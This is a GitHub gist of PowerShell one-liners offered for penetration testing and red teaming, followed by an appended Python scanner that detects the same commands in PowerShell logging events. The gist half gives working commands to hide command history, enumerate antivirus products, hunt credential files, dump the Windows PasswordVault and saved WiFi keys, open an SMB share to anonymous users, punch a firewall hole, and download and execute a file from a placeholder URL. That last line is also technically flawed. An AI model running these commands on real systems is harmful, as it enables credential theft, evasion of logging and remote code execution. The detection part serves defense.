@Twibow
Created April 12, 2023 20:51
Useful PowerShell commands for Pentest / Red Team
------------------------------------------------------------------------
..:: A few PowerShell commands - Useful for Pentest & Red Team ::..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------------------------------------
## Disable logging (history) of the commands in the current PowerShell session ##
------------------------------------------------------------------------------
PS C:\Users\Thibow> Set-PSReadlineOption -HistorySaveStyle SaveNothing
Or ...
PS C:\Users\Thibow> Remove-Module PSReadline
---------------------------------------------------
## List the AV / EDR products running on the endpoint ##
---------------------------------------------------
PS C:\Users\Thibow> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
----------------------------------------------
## Silently search for documents recursively ##
----------------------------------------------
PS C:\Users\Thibow> gci C:\Users\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
-------------------------------------------------------------------
## Search configuration files that contain the keyword "password" ##
-------------------------------------------------------------------
PS C:\Users\Thibow> gci C:\Users\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"
----------------------------------------------------------------
## Search for passwords in database configuration files ##
----------------------------------------------------------------
PS C:\Users\Thibow> gci C:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
-------------------------------------------------------
## Extract passwords from the Windows PasswordVault ##
-------------------------------------------------------
PS C:\Users\Thibow> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }
-------------------------------------------------------
## Retrieve the WiFi passwords saved on the endpoint ##
-------------------------------------------------------
# FR version (French-locale netsh output) #
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Contenu de la clé\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
# EN version (English-locale netsh output) #
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
---------------------------------------------------
## Change the MAC address of your network adapter ##
---------------------------------------------------
PS C:\Users\Thibow> Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"
---------------------------------------------------------
## Create an SMB shared directory accessible to everybody ##
---------------------------------------------------------
PS C:\Users\Thibow> new-item "C:\Users\prout\" -itemtype directory
PS C:\Users\Thibow> New-SmbShare -Name "sharedir" -Path "C:\Users\prout\" -FullAccess "Everyone","Guests","Anonymous Logon"
--------------------------------------------------------------------------------
## Whitelist an IP address on the local Windows firewall (allowed on all ports) ##
--------------------------------------------------------------------------------
PS C:\Users\Thibow> New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123
// Remove the rule ::
PS C:\Users\Thibow> Remove-NetFirewallRule -DisplayName "pentest"
----------------------------------
## Download and execute a file ##
----------------------------------
PS C:\Users\Thibow> iex(iwr("https://UrlDuFichier/123.exe"))
iwr == Invoke-WebRequest
iex == Invoke-Expression
--------------------------------------
## Get the SID of the current user ##
--------------------------------------
PS C:\Users\Thibow> ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value
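Added here as a defender-side companion to the one-liners above (this is not part of the gist): a small Python scanner that flags the literal forms of these commands in PowerShell Script Block Logging text. Disabling PSReadLine history only stops the local ConsoleHost_history.txt file; engine-level Script Block Logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational) still records the command text, which is what this scanner consumes. The event records are constructed inline and the rule names are labels invented for this example.

```python
import re

# Detection rules keyed to the literal one-liners in the gist above.
# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("psreadline-history-disabled",
     re.compile(r"Set-PSReadLineOption\s+[-–]HistorySaveStyle\s+SaveNothing"
                r"|Remove-Module\s+PSReadLine", re.I)),
    ("av-enumeration",
     re.compile(r"root[/\\]SecurityCenter2.*AntiVirusProduct", re.I)),
    ("credential-file-hunting",
     re.compile(r"\b(gci|Get-ChildItem)\b.*-Include\s+\S*(pass|cred)\S*.*-Recurse", re.I)),
    ("passwordvault-dump",
     re.compile(r"PasswordVault.*RetrievePassword", re.I | re.S)),
    ("wifi-key-export",
     re.compile(r"netsh\s+wlan\s+show\s+profile\b.*key=clear", re.I)),
    ("open-smb-share",
     re.compile(r"New-SmbShare.*-FullAccess\b.*\bEveryone\b", re.I)),
    ("download-and-execute",
     re.compile(r"\b(iex|Invoke-Expression)\s*\(?\s*(iwr|Invoke-WebRequest)\b", re.I)),
]

def scan_script_block(text):
    """Return the names of every rule whose pattern occurs in one script block."""
    return [name for name, rx in RULES if rx.search(text)]

def scan_events(events):
    """Examine only Script Block Logging events (ID 4104); return (record, [rule names]) per hit."""
    hits = []
    for ev in events:
        if ev["event_id"] != 4104:
            continue
        names = scan_script_block(ev["script"])
        if names:
            hits.append((ev["record"], names))
    return hits

# Constructed sample events (not real logs). Record 4 is a 4103 pipeline
# event and is deliberately ignored by scan_events.
SAMPLE_EVENTS = [
    {"record": 1, "event_id": 4104, "script": "Set-PSReadlineOption –HistorySaveStyle SaveNothing"},
    {"record": 2, "event_id": 4104, "script": "Get-Process | Sort-Object CPU -Descending"},
    {"record": 3, "event_id": 4104, "script": 'iex(iwr("https://UrlDuFichier/123.exe"))'},
    {"record": 4, "event_id": 4103, "script": "New-SmbShare -Name sharedir -FullAccess Everyone"},
    {"record": 5, "event_id": 4104, "script": '(netsh wlan show profiles) | % { netsh wlan show profile name="$name" key=clear }'},
    {"record": 6, "event_id": 4104, "script": "(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword(); $_ }"},
]
```

The patterns match only the spellings shown in this gist; a production rule set would need to be broader, and the 4103/4104 split shows why the event ID must be checked before the text is inspected.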